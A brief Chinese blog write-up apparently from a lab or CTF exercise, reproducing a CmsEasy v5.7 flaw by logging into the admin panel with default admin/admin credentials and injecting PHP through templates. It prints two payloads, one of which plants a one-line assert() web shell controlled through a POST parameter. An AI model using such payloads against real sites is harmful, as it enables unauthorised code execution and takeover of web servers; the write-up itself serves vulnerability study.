【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

复制代码
1111111111";}<?php phpinfo()?>

payload2:

复制代码
11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
LH_R17 小时前
OneTerm开源堡垒机实战(三):功能扩展与效率提升
运维·后端·安全
你的人类朋友1 天前
什么是API签名?
前端·后端·安全
深盾安全1 天前
ProGuard混淆在Android程序中的应用
安全
CYRUS_STUDIO1 天前
利用 Linux 信号机制(SIGTRAP)实现 Android 下的反调试
android·安全·逆向
佛祖让我来巡山1 天前
Java垃圾收集器全解:从Serial到G1的进化之旅
cms·gc·垃圾收集器·g1
白帽黑客沐瑶2 天前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业
深盾安全2 天前
符号执行技术实践-求解程序密码
安全
_落纸2 天前
三大基础无源电子元件——电阻(R)、电感(L)、电容(C)
笔记
Alice-YUE2 天前
【CSS学习笔记3】css特性
前端·css·笔记·html
2303_Alpha2 天前
SpringBoot
笔记·学习